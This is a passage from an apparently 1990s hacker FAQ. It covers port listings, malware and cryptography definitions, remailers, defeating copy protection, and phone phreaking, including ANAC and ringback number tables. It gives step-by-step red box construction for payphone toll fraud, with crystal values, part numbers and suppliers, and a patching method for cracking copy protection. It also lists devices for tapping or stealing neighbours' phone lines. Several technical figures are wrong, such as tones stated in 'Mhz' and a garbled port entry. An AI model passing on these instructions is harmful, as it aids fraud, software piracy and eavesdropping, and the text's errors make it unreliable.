  2567. rimsl           2044/udp
  2568. cdfunc          2045/tcp
  2569. cdfunc          2045/udp
  2570. sdfunc          2046/tcp
  2571. sdfunc          2046/udp
  2572. dls             2047/tcp
  2573. dls             2047/udp
  2574. dls-monitor     2048/tcp
  2575. dls-monitor     2048/udp
  2576. shilp           2049/tcp
  2577. shilp           2049/udp
  2578. www-dev         2784/tcp   world wide web - development
  2579. www-dev         2784/udp   world wide web - development
  2580. NSWS            3049/tcp
  2581. NSWS            3049/ddddp
  2582. rfa             4672/tcp   remote file access server
  2583. rfa             4672/udp   remote file access server
  2584. commplex-main   5000/tcp
  2585. commplex-main   5000/udp
  2586. commplex-link   5001/tcp
  2587. commplex-link   5001/udp
  2588. rfe             5002/tcp   radio free ethernet
  2589. rfe             5002/udp   radio free ethernet
  2590. rmonitor_secure 5145/tcp
  2591. rmonitor_secure 5145/udp
  2592. padl2sim        5236/tcp
  2593. padl2sim        5236/udp
  2594. sub-process     6111/tcp   HP SoftBench Sub-Process Control
  2595. sub-process     6111/udp   HP SoftBench Sub-Process Control
  2596. xdsxdm          6558/udp
  2597. xdsxdm          6558/tcp
  2598. afs3-fileserver 7000/tcp   file server itself
  2599. afs3-fileserver 7000/udp   file server itself
  2600. afs3-callback   7001/tcp   callbacks to cache managers
  2601. afs3-callback   7001/udp   callbacks to cache managers
  2602. afs3-prserver   7002/tcp   users & groups database
  2603. afs3-prserver   7002/udp   users & groups database
  2604. afs3-vlserver   7003/tcp   volume location database
  2605. afs3-vlserver   7003/udp   volume location database
  2606. afs3-kaserver   7004/tcp   AFS/Kerberos authentication service
  2607. afs3-kaserver   7004/udp   AFS/Kerberos authentication service
  2608. afs3-volser     7005/tcp   volume managment server
  2609. afs3-volser     7005/udp   volume managment server
  2610. afs3-errors     7006/tcp   error interpretation service
  2611. afs3-errors     7006/udp   error interpretation service
  2612. afs3-bos        7007/tcp   basic overseer process
  2613. afs3-bos        7007/udp   basic overseer process
  2614. afs3-update     7008/tcp   server-to-server updater
  2615. afs3-update     7008/udp   server-to-server updater
  2616. afs3-rmtsys     7009/tcp   remote cache manager service
  2617. afs3-rmtsys     7009/udp   remote cache manager service
  2618. man             9535/tcp
  2619. man             9535/udp
  2620. isode-dua       17007/tcp
  2621. isode-dua       17007/udp
  2622.  
  2623.  
  2624. 23. What is a trojan/worm/virus/logic bomb?
  2625.  
  2626. This FAQ answer is excerpted from: Computer Security Basics
  2627.                                    by Deborah Russell
  2628.                                    and G.T. Gengemi Sr.
  2629.  
  2630. Trojan:     An independent program that appears to perform a useful
  2631.             function but that hides another unauthorized program
  2632.             inside it.  When an authorized user performs the apparent
  2633.             function, the trojan horse performs the unauthorized
  2634.             function as well (often usurping the privileges of the
  2635.             user).
  2636.  
  2637. Virus:      A code fragment (not an independent program) that
  2638.             reproduces by attaching to another program.  It may damage
  2639.             data directly, or it may degrade system performance by
  2640.             taking over system resources which are then not available
  2641.             to authorized users.
  2642.  
  2643. Worm:       An independent program that reproduces by copying itself
  2644.             from one system to another, usually over a network.  Like
  2645.             a virus, a worm may damage data directly, or it may
  2646.             degrade system performance by tying up system resources and
  2647.             even shutting down a network.
  2648.  
  2649. Logic Bomb: A method for releasing a system attack of some kind.  It
  2650.             is triggered when a particular condition (e.g., a certain
  2651.             date or system operation) occurs.
  2652.  
  2653.  
  2654. 24. How can I protect myself from virii and such?
  2655.  
  2656. Always write protect your floppy disks when you are not purposefully
  2657. writing to them.
  2658.  
  2659. Use ATTRIB to make all of your EXE and COM files read only.  This will
  2660. protect you from many poorly written viruses.
  2661.  
  2662. Scan any software that you receive with a recent copy of a good virus
  2663. scanner.  The best virus scanner currently available for DOS is F-Prot
  2664. by Fridrik Skulason.  The current version is FP-215.  It is best to
  2665. use more than one virus scanner.  That will decrease your chances of
  2666. missing a virus.
  2667.  
  2668. Backup regularly, and keep several generations of backups on hand.
  2669. If you always backup over your last backup, you may find yourself with
  2670. an infected backup tape.
  2671.  
  2672.  
  2673. 25. What is Cryptoxxxxxxx?
  2674.  
  2675. This FAQ answer is excerpted from: Computer Security Basics
  2676.                                    by Deborah Russell
  2677.                                    and G.T. Gengemi Sr.
  2678.  
  2679. A message is called either plaintext or cleartext.  The process of
  2680. disguising a message in such a way as to hide its substance is called
  2681. encryption.  An encrypted message is called ciphertext.  The process
  2682. of turning ciphertext back into plaintext is called decryption.
  2683.  
  2684. The art and science of keeping messages secure is called cryptography,
  2685. and it is practiced by cryptographers.  Cryptanalysts are
  2686. practitioners of cryptanalysis, the art and science of breaking
  2687. ciphertext, i.e. seeing through the disguise.  The branch of
  2688. mathematics embodying both cryptography and cryptanalysis is called
  2689. cryptology, and it's practitioners are called cryptologists.
  2690.  
  2691.  
  2692. 26. What is PGP?
  2693.  
  2694. This FAQ answer is excerpted from: PGP(tm) User's Guide
  2695.                                    Volume I: Essential Topics
  2696.                                    by Philip Zimmermann
  2697.  
  2698. PGP(tm) uses public-key encryption to protect E-mail and data files.
  2699. Communicate securely with people you've never met, with no secure
  2700. channels needed for prior exchange of keys.  PGP is well featured and
  2701. fast, with sophisticated key management, digital signatures, data
  2702. compression, and good ergonomic design.
  2703.  
  2704. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
  2705. high security cryptographic software application for MS-DOS, Unix,
  2706. VAX/VMS, and other computers.  PGP allows people to exchange files or
  2707. messages with privacy, authentication, and convenience.  Privacy means
  2708. that only those intended to receive a message can read it.
  2709. Authentication means that messages that appear to be from a particular
  2710. person can only have originated from that person. Convenience means
  2711. that privacy and authentication are provided without the hassles of
  2712. managing keys associated with conventional cryptographic software.  No
  2713. secure channels are needed to exchange keys between users, which makes
  2714. PGP much easier to use.  This is because PGP is based on a powerful
  2715. new technology called "public key" cryptography.
  2716.  
  2717. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
  2718. public key cryptosystem with the speed of conventional cryptography,
  2719. message digests for digital signatures, data compression before
  2720. encryption, good ergonomic design, and sophisticated key management. 
  2721. And PGP performs the public-key functions faster than most other
  2722. software implementations.  PGP is public key cryptography for the
  2723. masses.
  2724.  
  2725.  
  2726. 27. What is Tempest?
  2727.  
  2728. Tempest stands for Transient Electromagnetic Pulse Surveillance
  2729. Technology.
  2730.  
  2731. Computers and other electronic equipment release interference to their
  2732. surrounding environment.  You may observe this by placing two video
  2733. monitors close together.  The pictures will behave erratically until
  2734. you space them apart.
  2735.  
  2736. Although most of the time these emissions are simply annoyances, they
  2737. can sometimes be very helpful.  Suppose we wanted to see what project
  2738. a target was working on.  We could sit in a van outside her office and
  2739. use sensitive electronic equipment to attempt to pick up and decipher
  2740. the emanations from her video monitor.
  2741.  
  2742. Our competitor, however, could shield the emanations from her
  2743. equipment or use equipment without strong emanations.
  2744.  
  2745. Tempest is the US Government program for evaluation and endorsement
  2746. of electronic equipment that is safe from eavesdropping.
  2747.  
  2748.  
  2749. 28. What is an anonymous remailer?
  2750.  
  2751. An anonymous remailer is a system on the Internet that allows you to
  2752. send e-mail anonymously or post messages to Usenet anonymously.
  2753.  
  2754. You apply for an anonymous ID at the remailer site.  Then, when you
  2755. send a message to the remailer, it sends it out from your anonymous ID
  2756. at the remailer.  No one reading the post will know your real account
  2757. name or host name.  If someone sends a message to your anonymous ID,
  2758. it will be forwarded to your real account by the remailer.
  2759.  
  2760.  
  2761. 29. What are the addresses of some anonymous remailers?
  2762.  
  2763. The most popular and stable anonymous remailer is anon.penet.fi,
  2764. operated by Johan Helsingus.  To obtain an anonymous ID, mail
  2765. ping@anon.penet.fi.  For assistance is obtaining an anonymous account
  2766. at penet, mail help@anon.penet.fi.
  2767.  
  2768. To see a list on anonymous remailers, finger
  2769. remailer-list@kiwi.cs.berkeley.edu.
  2770.  
  2771.  
  2772. 30. How do I defeat Copy Protection?
  2773.  
  2774. There are two common methods of defeating copy protection.  The first
  2775. is to use a program that removes copy protection.  Popular programs
  2776. that do this are CopyIIPC from Central Point Software and CopyWrite
  2777. from Quaid Software.  The second method involves patching the copy
  2778. protected program.  For popular software, you may be able to locate a
  2779. ready made patch.  You can them apply the patch using any hex editor,
  2780. such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
  2781. patch the software yourself.
  2782.  
  2783. Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
  2784. also requires some knowledge of assembly language.  Load the protected
  2785. program under the debugger and watch for it to check the protection
  2786. mechanism.  When it does, change that portion of the code.  The code
  2787. can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
  2788. JMP (Jump Unconditionally).  Or the code may simply be replaced with
  2789. NOP (No Operation) instructions.
  2790.  
  2791.  
  2792. 31. What is 127.0.0.1?
  2793.  
  2794. 127.0.0.1 is a loopback network connection.  If you telnet, ftp, etc...
  2795. to it you are connected to your own machine.
  2796.  
  2797.  
  2798.  
  2799.  
  2800. Section B: Telephony
  2801. ~~~~~~~~~~~~~~~~~~~~
  2802.  
  2803. 01. What is a Red Box?
  2804.  
  2805. When a coin is inserted into a payphone, the payphone emits a set of
  2806. tones to ACTS (Automated Coin Toll System).  Red boxes work by fooling
  2807. ACTS into believing you have actually put money into the phone.  The
  2808. red box simply plays the ACTS tones into the telephone microphone.
  2809. ACTS hears those tones, and allows you to place your call.  The actual
  2810. tones are:
  2811.  
  2812. Nickel Signal      1700+2200  0.060s on
  2813. Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating
  2814. Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating
  2815.  
  2816.  
  2817. 02. How do I build a Red Box?
  2818.  
  2819. Red boxes are commonly manufactured from modified Radio Shack tone
  2820. dialers, Hallmark greeting cards, or made from scratch from readily
  2821. available electronic components.
  2822.  
  2823. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
  2824. open the dialer and replace the crystal with a new one.  
  2825. The purpose of the new crystal is to cause the * button on your tone
  2826. dialer to create a 1700Mhz and 2200Mhz tone instead of the original
  2827. 941Mhz and 1209Mhz tones.  The exact value of the replacement crystal
  2828. should be 6.466806 to create a perfect 1700Mhz tone and 6.513698 to
  2829. create a perfect 2200mhz tone. A crystal close to those values will
  2830. create a tone that easily falls within the loose tolerances of ACTS.
  2831. The most popular choice is the 6.5536Mhz crystal, because it is the
  2832. eaiest to procure.  The old crystal is the large shiny metal component
  2833. labeled "3.579545Mhz."  When you are finished replacing the crystal,
  2834. program the P1 button with five *'s.  That will simulate a quarter
  2835. tone each time you press P1.
  2836.  
  2837.  
  2838. 03. Where can I get a 6.5536Mhz crystal?
  2839.  
  2840. Your best bet is a local electronics store.  Radio Shack sells them,
  2841. but they are overpriced and the store must order them in.  This takes
  2842. approximately two weeks.  In addition, many Radio Shack employees do
  2843. not know that this can be done.
  2844.  
  2845. Or, you could order the crystal mail order.  This introduces Shipping
  2846. and Handling charges, which are usually much greater than the price of
  2847. the crystal.  It's best to get several people together to share the
  2848. S&H cost.  Or, buy five or six yourself and sell them later.  Some of
  2849. the places you can order crystals are:
  2850.  
  2851. Digi-Key
  2852. 701 Brooks Avenue South
  2853. P.O. Box 677
  2854. Thief River Falls, MN 56701-0677
  2855. (80)344-4539
  2856. Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
  2857. Part Number:X018-ND
  2858.  
  2859. JDR Microdevices:
  2860. 2233 Branham Lane
  2861. San Jose, CA 95124
  2862. (800)538-5000
  2863. Part Number: 6.5536MHZ
  2864.  
  2865. Tandy Express Order Marketing
  2866. 401 NE 38th Street
  2867. Fort Worth, TX 76106
  2868. (800)241-8742
  2869. Part Number: 10068625
  2870.  
  2871.  
  2872. 04. Which payphones will a Red Box work on?
  2873.  
  2874. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  2875. (Customer Owned Coin Operated Telephones).
  2876.  
  2877. Red boxes work by fooling ACTS (Automated Coin Toll System) into
  2878. believing you have put money into the pay phone.  ACTS is the
  2879. telephone company software responsible for saying "Please deposit XX
  2880. cents" and listening for the coins being deposited.
  2881.  
  2882. COCOT's do not use ACTS.  On a COCOT, the pay phone itself is
  2883. responsible for determining what coins have been inserted.
  2884.  
  2885.  
  2886. 05. How do I make local calls with a Red Box?
  2887.  
  2888. Payphones do not use ACTS for local calls.  To use your red box for
  2889. local calls, you have to fool ACTS into getting involved in the call.
  2890.  
  2891. One way to do this, in some areas, is by dialing 10288-xxx-xxxx.  This
  2892. makes your call a long distance call, and brings ACTS into the
  2893. picture.
  2894.  
  2895. In other areas, you can call Directory Assistance and ask for the
  2896. number of the person you are trying to reach.  The operator will give
  2897. you the number and then you will hear a message similar to "Your call
  2898. can be completed automatically for an additional 35 cents."  When this
  2899. happens, you can then use ACTS tones.
  2900.  
  2901.  
  2902. 06. What is a Blue Box?
  2903.  
  2904. Blue boxes use a 2600hz tone to size control of telephone switches
  2905. that use in-band signalling.  The caller may then access special
  2906. switch functions, with the usual purpose of making free long distance
  2907. phone calls, using the tones provided by the Blue Box.
  2908.  
  2909.  
  2910. 07. Do Blue Boxes still work?
  2911.  
  2912. Blue Boxes still work in areas using in band signalling.  Modern phone
  2913. switches use out of band signalling.  Nothing you send over the voice
  2914. portion of bandwidth can control the switch.
  2915.  
  2916.  
  2917. 08. What is a Black Box?
  2918.  
  2919. A Black Box is a 1.8k ohm resistor placed across your phone line to
  2920. cause the phone company equipment to be unable to detect that you have
  2921. answered your telephone.  People who call you will then not be billed
  2922. for the telephone call.  Black boxes do not work under ESS.
  2923.  
  2924.  
  2925. 09. What do all the colored boxes do?
  2926.  
  2927. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
  2928.          Call Forwarding on old 4-wire phone systems
  2929. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  2930. Beige        Lineman's hand set
  2931. Black        Allows the calling party to not be billed for the call
  2932.          placed
  2933. Blast        Phone microphone amplifier
  2934. Blotto       Supposedly shorts every fone out in the immediate area
  2935. Blue         Emulate a true operator by seizing a trunk with a 2600hz
  2936.          tone
  2937. Brown        Create a party line from 2 phone lines
  2938. Bud          Tap into your neighbors phone line
  2939. Chartreuse   Use the electricity from your phone line
  2940. Cheese       Connect two phones to create a diverter
  2941. Chrome       Manipulate Traffic Signals by Remote Control
  2942. Clear        A telephone pickup coil and a small amp use to make free
  2943.          calls on Fortress Phones
  2944. Color        Line activated telephone recorder
  2945. Copper       Cause crosstalk interference on an extender
  2946. Crimson      Hold button
  2947. Dark         Re-route outgoing or incoming calls to another phone
  2948. Dayglo       Connect to your neighbors phone line
  2949. Divertor     Re-route outgoing or incoming calls to another phone
  2950. DLOC         Create a party line from 2 phone lines
  2951. Gold         Trace calls, tell if the call is being traced, and can
  2952.          change a trace
  2953. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  2954. Infinity     Remotely activated phone tap
  2955. Jack         Touch-Tone key pad
  2956. Light        In-use light
  2957. Lunch        AM transmitter
  2958. Magenta      Connect a remote phone line to another remote phone line
  2959. Mauve        Phone tap without cutting into a line
  2960. Neon         External microphone
  2961. Noise        Create line noise
  2962. Olive        External ringer
  2963. Party        Create a party line from 2 phone lines
  2964. Pearl        Tone generator
  2965. Pink         Create a party line from 2 phone lines
  2966. Purple       Telephone hold button
  2967. Rainbow      Kill a trace by putting 120v into the phone line (joke)
  2968. Razz         Tap into your neighbors phone
  2969. Red          Make free phone calls from pay phones by generating
  2970.          quarter tones
  2971. Rock         Add music to your phone line
  2972. Scarlet      Cause a neighbors phone line to have poor reception
  2973. Silver       Create the DTMF tones for A, B, C and D
  2974. Static       Keep the voltage on a phone line high
  2975. Switch       Add hold, indicator lights, conferencing, etc..
  2976. Tan          Line activated telephone recorder
  2977. Tron         Reverse the phase of power to your house, causing your
  2978.          electric meter to run slower
  2979. TV Cable     "See" sound waves on your TV
  2980. Urine        Create a capacitative disturbance between the ring and
  2981.          tip wires in another's telephone headset
  2982. Violet       Keep a payphone from hanging up
  2983. White        Portable DTMF keypad
  2984. Yellow       Add an extension phone
  2985.  
  2986. Box schematics may be retrieved from these FTP sites:
  2987.  
  2988. ftp.netcom.com          /pub/va/vandal                  (DnA)
  2989. ftp.winternet.com       /users/craigb                   (H/P)
  2990.  
  2991.  
  2992. 10. What is an ANAC number?
  2993.  
  2994. An ANAC (Automatic Number Announcement Circuit) number is a telephone
  2995. number that plays back the number of the telephone that called it.
  2996. ANAC numbers are convenient if you want to know the telephone number
  2997. of a pair of wires.
  2998.  
  2999.  
  3000. 11. What is the ANAC number for my area?
  3001.  
  3002. How to find your ANAC number:
  3003.  
  3004. Look up your NPA (Area Code) and try the number listed for it. If that
  3005. fails, try 1 plus the number listed for it.  If that fails, try the
  3006. common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
  3007. number for your area, please let us know.
  3008.  
  3009. Note that many times the ANAC number will vary for different switches
  3010. in the same city.  The geographic naming on the list is not intended
  3011. to be an accurate reference for coverage patterns, it is for
  3012. convenience only.
  3013.  
  3014. Many companies operate 800 number services which will read back to you
  3015. the number from which you are calling.  Many of these require
  3016. navigating a series of menus to get the phone number you are looking
  3017. for.
  3018.  
  3019. (800)238-4959   A voice mail system
  3020. (800)328-2630   A phone sex line
  3021. (800)568-3197   Info Access Telephone Company's Automated Blocking Line
  3022. (800)571-8859   A phone sex line
  3023. (800)692-6447   (800)MY-ANI-IS
  3024. (800)769-3766   Duke Power Company Automated Outage System
  3025.  
  3026. An non-800 ANAC that works nationwide is 404-988-9664.  The one catch
  3027. with this number is that it must be dialed with the AT&T Carrier
  3028. Access Code 10732.
  3029.  
  3030. Another non-800 nationwide ANAC is Glen Robert of Full Disclosure
  3031. Magazine's number, 10555-1-708-356-9646.
  3032.  
  3033. Please use local ANAC numbers if you can, as abuse or overuse kills
  3034. 800 ANAC numbers.
  3035.  
  3036.  
  3037. NPA  ANAC number      Comments
  3038. ---  ---------------  ---------------------------------------------
  3039. 201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  3040. 202  811              District of Columbia
  3041. 203  960              CT (All)
  3042. 203  970              CT (All)
  3043. 205  908-222-2222     Birmingham, AL
  3044. 206  411              WA (Not US West)
  3045. 207  958              ME (All)
  3046. 209  830-2121         Stockton, CA
  3047. 209  211-9779         Stockton, CA
  3048. 212  958              Manhattan, NY
  3049. 213  114              Los Angeles, CA
  3050. 213  1223             Los Angeles, CA (Some 1AESS switches)
  3051. 213  211-2345         Los Angeles, CA (English response)
  3052. 213  211-2346         Los Angeles, CA (DTMF response)
  3053. 213  61056            Los Angeles, CA
  3054. 214  570              Dallas, TX
  3055. 214  790              Dallas, TX (GTE)
  3056. 214  970-222-2222     Dallas, TX
  3057. 214  970-611-1111     Dallas, TX (Southwestern Bell)
  3058. 215  410-xxxx         Philadelphia, PA
  3059. 215  511              Philadelphia, PA
  3060. 215  958              Philadelphia, PA
  3061. 217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  3062. 219  550              Gary/Hammond/Michigan City/Southbend, IN
  3063. 219  559              Gary/Hammond/Michigan City/Southbend, IN
  3064. 301  958-9968         Hagerstown/Rockville, MD
  3065. 305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
  3066. 309  200-xxx-xxxx     Peoria/Rock Island, IL
  3067. 310  114              Long Beach, CA (On many GTE switches)
  3068. 310  1223             Long Beach, CA (Some 1AESS switches)
  3069. 310  211-2345         Long Beach, CA (English response)
  3070. 310  211-2346         Long Beach, CA (DTMF response)
  3071. 312  200              Chicago, IL
  3072. 312  290              Chicago, IL
  3073. 312  1-200-8825       Chicago, IL (Last four change rapidly)
  3074. 312  1-200-555-1212   Chicago, IL
  3075. 313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  3076. 313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  3077. 313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  3078. 313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  3079. 314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO
  3080. 315  953              Syracuse/Utica, NY
  3081. 315  958              Syracuse/Utica, NY
  3082. 315  998              Syracuse/Utica, NY
  3083. 317  310-222-2222     Indianapolis/Kokomo, IN
  3084. 317  743-1218         Indianapolis/Kokomo, IN
  3085. 401  200-200-4444     RI (All)
  3086. 401  222-2222         RI (All)
  3087. 402  311              Lincoln, NE
  3088. 404  311              Atlanta, GA
  3089. 404  940-xxx-xxxx     Atlanta, GA
  3090. 404  990              Atlanta, GA
  3091. 405  890-7777777      Enid/Oklahoma City, OK
  3092. 405  897              Enid/Oklahoma City, OK
  3093. 407  200-222-2222     Orlando/West Palm Beach, FL
  3094. 408  300-xxx-xxxx     San Jose, CA
  3095. 408  760              San Jose, CA
  3096. 408  940              San Jose, CA
  3097. 409  951              Beaumont/Galveston, TX
  3098. 409  970-xxxx         Beaumont/Galveston, TX
  3099. 410  200-6969         Annapolis/Baltimore, MD
  3100. 410  200-555-1212     Annapolis/Baltimore, MD
  3101. 410  811              Annapolis/Baltimore, MD
  3102. 412  711-6633         Pittsburgh, PA
  3103. 412  711-4411         Pittsburgh, PA
  3104. 412  999-xxxx         Pittsburgh, PA
  3105. 413  958              Pittsfield/Springfield, MA
  3106. 413  200-555-5555     Pittsfield/Springfield, MA
  3107. 414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3108. 415  200-555-1212     San Francisco, CA
  3109. 415  211-2111         San Francisco, CA
  3110. 415  2222             San Francisco, CA
  3111. 415  640              San Francisco, CA
  3112. 415  760-2878         San Francisco, CA
  3113. 415  7600-2222        San Francisco, CA
  3114. 419  311              Toledo, OH
  3115. 502  2002222222       Frankfort/Louisville/Paducah/Shelbyville, KY
  3116. 502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  3117. 503  611              Portland, OR
  3118. 503  999              Portland, OR (GTE)
  3119. 504  99882233         Baton Rouge/New Orleans, LA
  3120. 504  201-269-1111     Baton Rouge/New Orleans, LA
  3121. 504  998              Baton Rouge/New Orleans, LA
  3122. 504  99851-0000000000 Baton Rouge/New Orleans, LA
  3123. 508  958              Fall River/New Bedford/Worchester, MA
  3124. 508  200-222-1234     Fall River/New Bedford/Worchester, MA
  3125. 508  200-222-2222     Fall River/New Bedford/Worchester, MA
  3126. 508  26011            Fall River/New Bedford/Worchester, MA
  3127. 509  560              Spokane/Walla Walla/Yakima, WA
  3128. 512  830              Austin/Corpus Christi, TX
  3129. 512  970-xxxx         Austin/Corpus Christi, TX
  3130. 515  5463             Des Moines, IA
  3131. 515  811              Des Moines, IA
  3132. 516  958              Hempstead/Long Island, NY
  3133. 516  968              Hempstead/Long Island, NY
  3134. 517  200-222-2222     Bay City/Jackson/Lansing, MI
  3135. 517  200200200200200  Bay City/Jackson/Lansing, MI
  3136. 518  997              Albany/Schenectady/Troy, NY
  3137. 518  998              Albany/Schenectady/Troy, NY
  3138. 602  593-0809         Phoenix, AZ
  3139. 602  593-6017         Phoenix, AZ
  3140. 602  593-7451         Phoenix, AZ
  3141. 603  200-222-2222     NH (All)
  3142. 606  997-555-1212     Ashland/Winchester, KY
  3143. 606  711              Ashland/Winchester, KY
  3144. 607  993              Binghamton/Elmira, NY
  3145. 609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  3146. 610  958              Allentown/Reading, PA
  3147. 612  511              Minneapolis/St.Paul, MN
  3148. 615  200200200200200  Chatanooga/Knoxville/Nashville, TN
  3149. 615  2002222222       Chatanooga/Knoxville/Nashville, TN
  3150. 615  830              Nashville, TN
  3151. 616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  3152. 617  200-222-1234     Boston, MA
  3153. 617  200-222-2222     Boston, MA
  3154. 617  200-444-4444     Boston, MA (Woburn, MA)
  3155. 617  220-2622         Boston, MA
  3156. 617  958              Boston, MA
  3157. 618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  3158. 618  930              Alton/Cairo/Mt.Vernon, IL
  3159. 703  811              Alexandria/Arlington/Roanoke, VA
  3160. 708  1-200-555-1212   Chicago/Elgin, IL
  3161. 708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
  3162. 708  356-9646         Chicago/Elgin, IL
  3163. 713  970-xxxx         Houston, TX
  3164. 714  114              Anaheim, CA (GTE)
  3165. 714  211-2121         Anaheim, CA (PacBell)
  3166. 714  211-2222         Anaheim, CA (Pacbell)
  3167. 716  511              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  3168. 717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  3169. 718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  3170. 802  2-222-222-2222   Vermont (All)
  3171. 802  200-222-2222     Vermont (All)
  3172. 805  211-2345         Bakersfield/Santa Barbara, CA
  3173. 805  211-2346         Bakersfield/Santa Barbara, CA (Returns DTMF)
  3174. 805  830              Bakersfield/Santa Barbara, CA
  3175. 806  970-xxxx         Amarillo/Lubbock, TX
  3176. 810  200200200200200  Flint/Pontiac/Southfield/Troy, MI
  3177. 812  410-555-1212     Evansville, IN
  3178. 813  311              Ft. Meyers/St. Petersburg/Tampa, FL
  3179. 815  200-xxx-xxxx     La Salle/Rockford, IL
  3180. 815  290              La Salle/Rockford, IL
  3181. 817  211              Ft. Worth/Waco, TX
  3182. 817  970-611-1111     Ft. Worth/Waco, TX  (Southwestern Bell)
  3183. 818  1223             Pasadena, CA (Some 1AESS switches)
  3184. 818  211-2345         Pasadena, CA (English response)
  3185. 818  211-2346         Pasadena, CA (DTMF response)
  3186. 906  1-200-222-2222   Marquette/Sault Ste. Marie, MI
  3187. 908  958              New Brunswick, NJ
  3188. 910  200              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3189. 910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3190. 910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3191. 914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3192. 915  970-xxxx         Abilene/El Paso, TX
  3193. 919  200              Durham, NC
  3194. 919  711              Durham, NC
  3195.  
  3196. Canada:
  3197. 204  644-xxxx         Manitoba
  3198. 306  115              Saskatchewan, Canada
  3199. 403  311              Alberta, Yukon and N.W. Territory
  3200. 403  908-222-2222     Alberta, Yukon and N.W. Territory
  3201. 403  999              Alberta, Yukon and N.W. Territory
  3202. 416  997-xxxx         Toronto, Ontario
  3203. 514  320-xxxx         Montreal, Quebec
  3204. 519  320-xxxx         London, Ontario
  3205. 604  1116             British Columbia, Canada
  3206. 604  1211             British Columbia, Canada
  3207. 604  211              British Columbia, Canada
  3208. 613  320-2232         Ottawa, Ontario
  3209. 705  320-4567         North Bay/Saulte Ste. Marie, Ontario
  3210.  
  3211. Australia:
  3212. +61  03-552-4111      Victoria 03 area
  3213. +612 19123            All major capital cities
  3214.  
  3215. United Kingdom:
  3216. 175
  3217.  
  3218.  
  3219. 12. What is a ringback number?
  3220.  
  3221. A ringback number is a number that you call that will immediately
  3222. ring the telephone from which it was called.
  3223.  
  3224. In most instances you must call the ringback number, quickly hang up
  3225. the phone for just a short moment and then let up on the switch, you
  3226. will then go back off hook and hear a different tone.  You may then
  3227. hang up.  You will be called back seconds later.
  3228.  
  3229.  
  3230. 13. What is the ringback number for my area?
  3231.  
  3232. An 'x' means insert those numbers from the phone number from which you
  3233. are calling.  A '?' means that the number varies from switch to switch
  3234. in the area, or changes from time to time.  Try all possible
  3235. combinations.
  3236.  
  3237. If the ringback for your NPA is not listed, try common ones such as
  3238. 954, 957 and 958.  Also, try using the numbers listed for other NPA's
  3239. served by your telephone company.
  3240.  
  3241. 201  55?-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
  3242. 202  958-xxxx         District of Columbia
  3243. 203  991-xxxx         CT (All)
  3244. 213  1-95x-xxxx       Los Angeles, CA
  3245. 219  571-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  3246. 219  777-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  3247. 301  579-xxxx         Hagerstown/Rockville, MD
  3248. 301  958-xxxx         Hagerstown/Rockville, MD
  3249. 303  99X-xxxx         Grand Junction, CO
  3250. 305  999-xxxx         Ft. Lauderdale/Key West/Miami, FL
  3251. 312  511-xxxx         Chicago, IL
  3252. 312  511-xxx-xxxx     Chicago, IL
  3253. 312  57?-xxxx         Chicago, IL
  3254. 315  98x-xxxx         Syracuse/Utica, NY
  3255. 317  777-xxxx         Indianapolis/Kokomo, IN
  3256. 317  yyy-xxxx         Indianapolis/Kokomo, IN (y=3rd digit of phone number)
  3257. 319  79x-xxxx         Davenport/Dubuque, Iowa
  3258. 401  98?-xxxx         RI (All)
  3259. 404  450-xxxx         Atlanta, GA
  3260. 407  988-xxxx         Orlando/West Palm Beach, FL
  3261. 412  985-xxxx         Pittsburgh, PA
  3262. 414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3263. 414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3264. 415  350-xxxx         San Francisco, CA
  3265. 417  551-xxxx         Joplin/Springfield, MO
  3266. 501  721-xxx-xxxx     AR (All)
  3267. 502  988              Frankfort/Louisville/Paducah/Shelbyville, KY
  3268. 504  99x-xxxx         Baton Rouge/New Orleans, LA
  3269. 504  9988776655       Baton Rouge/New Orleans, LA
  3270. 505  59?-xxxx         New Mexico (All)
  3271. 512  95X-xxxx         Austin, TX
  3272. 513  99?-xxxx         Cincinnati/Dayton, OH
  3273. 516  660-xxx-xxxx     Hempstead/Long Island, NY
  3274. 601  777-xxxx         MS (All)
  3275. 609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
  3276. 612  511              Minneapolis/St.Paul, MN
  3277. 612  999-xxx-xxxx     Minneapolis/St.Paul, MN
  3278. 615  930-xxxx         Chatanooga/Knoxville/Nashville, TN
